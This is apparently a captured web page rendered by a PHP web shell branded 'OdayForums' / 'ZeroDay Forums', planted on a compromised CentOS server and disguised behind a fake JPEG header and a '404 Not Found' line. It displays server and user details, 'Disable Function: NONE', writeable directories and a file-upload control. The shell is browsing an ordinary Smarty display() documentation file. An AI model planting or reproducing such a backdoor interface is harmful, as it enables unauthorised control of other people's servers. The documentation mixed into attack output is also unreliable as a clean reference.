����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/netphim/vendor/smarty/smarty/docs/programmers/api-functions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/netphim/vendor/smarty/smarty/docs/programmers/api-functions/api-display.md
display()

displays the template

Description
===========

void

display

string

template

string

cache\_id

string

compile\_id

This displays the contents of a template. To return the contents of a
template into a variable, use [`fetch()`](#api.fetch). Supply a valid
[template resource](#resources) type and path. As an optional second
parameter, you can pass a `$cache_id`, see the [caching
section](#caching) for more information.

PARAMETER.COMPILEID


    <?php
    include(SMARTY_DIR.'Smarty.class.php');
    $smarty = new Smarty();
    $smarty->setCaching(true);

    // only do db calls if cache doesn't exist
    if(!$smarty->isCached('index.tpl')) {

      // dummy up some data
      $address = '245 N 50th';
      $db_data = array(
                   'City' => 'Lincoln',
                   'State' => 'Nebraska',
                   'Zip' => '68502'
                 );

      $smarty->assign('Name', 'Fred');
      $smarty->assign('Address', $address);
      $smarty->assign('data', $db_data);

    }

    // display the output
    $smarty->display('index.tpl');
    ?>

       

Use the syntax for [template resources](#resources) to display files
outside of the [`$template_dir`](#variable.template.dir) directory.


    <?php
    // absolute filepath
    $smarty->display('/usr/local/include/templates/header.tpl');

    // absolute filepath (same thing)
    $smarty->display('file:/usr/local/include/templates/header.tpl');

    // windows absolute filepath (MUST use "file:" prefix)
    $smarty->display('file:C:/www/pub/templates/header.tpl');

    // include from template resource named "db"
    $smarty->display('db:header.tpl');
    ?>

       

See also [`fetch()`](#api.fetch) and
[`templateExists()`](#api.template.exists).

ZeroDay Forums Mini